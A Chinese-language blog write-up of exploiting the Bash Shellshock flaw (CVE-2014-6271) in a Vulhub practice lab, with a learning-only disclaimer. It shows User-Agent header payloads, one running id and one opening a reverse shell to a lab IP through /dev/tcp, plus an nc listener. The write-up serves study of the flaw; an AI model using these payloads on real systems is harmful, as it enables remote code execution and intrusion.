Vulhub 中的 bash CVE-2014-6271

0x00 前言

声明:本文仅做学习交流,遵守《网络安全法》。

先学习原理,一个挺老的漏洞了。该漏洞可以通过构造环境变量的值来执行想要执行的攻击代码脚本,会影响到与Bash交互的多种应用,包括HTTP、OpenSSH、DHCP等。

总的来讲,攻击者通过控制变量进行远程代码执行。

0x01 CVE-2014-6271

先通过nmap进行端口扫描。

访问8080的时候发现是apache的主页面。

这样不行啊,这得扫描后台。

有新的收获。访问之后发现是很有名的 hello world。

要不是地址不同我还以为浏览器没什么变化呢。这怎么办?抓个包吧。在User-Agent处写上payload。

复制代码
User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id

成功看到用户id。那说明id这条命令已经被执行了,那就可以......

复制代码
User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /bin/bash -i >& /dev/tcp/192.168.217.177/8888 0>&1

开启nc之后,构造上面的poc。

复制代码
nc -nlvp 8888

BurpSuite没有回显,但是nc有回显了。

0x02 总结

一开始执行id的时候是没有回显的,以为是Burp的包构造问题,后来发现是payload构造的有问题。另外,在回弹shell的时候,由于payload写的有问题导致回弹失败。 //多打了一个"/" 真丢人

相关推荐
zjeweler2 小时前
web安全-waf+免杀
安全·web安全
CHICX12292 小时前
6.SQL 注入之基础防御:从魔术引号到类型校验,彻底封堵注入漏洞
web安全·网络安全
路baby2 小时前
Pikachu安装过程中常见问题(apache和MySQL无法正常启动)
计算机网络·mysql·网络安全·adb·靶场·apache·pikachu
以太浮标2 小时前
华为eNSP模拟器综合实验之- 华为USG6000V防火墙配置防御DoS攻击实战案例解析
运维·网络协议·网络安全·华为·信息与通信
人道领域2 小时前
OpenClaw 源码泄露风波:一场由 “手滑” 引发的 AI 安全大地震
人工智能·安全·open claw
网络安全许木2 小时前
自学渗透测试第八天(网络安全法、伦理规范与工具链联动)
windows·web安全·网络安全·渗透测试·kali linux
pencek2 小时前
HakcMyVM-Animetronic
网络安全
刘~浪地球2 小时前
Redis 从入门到精通(十五):安全配置与性能优化
redis·安全·性能优化
xuansec2 小时前
ThinkPHP 6.0.X 反序列化漏洞利用指南(PHPGGC 工具版)
安全·php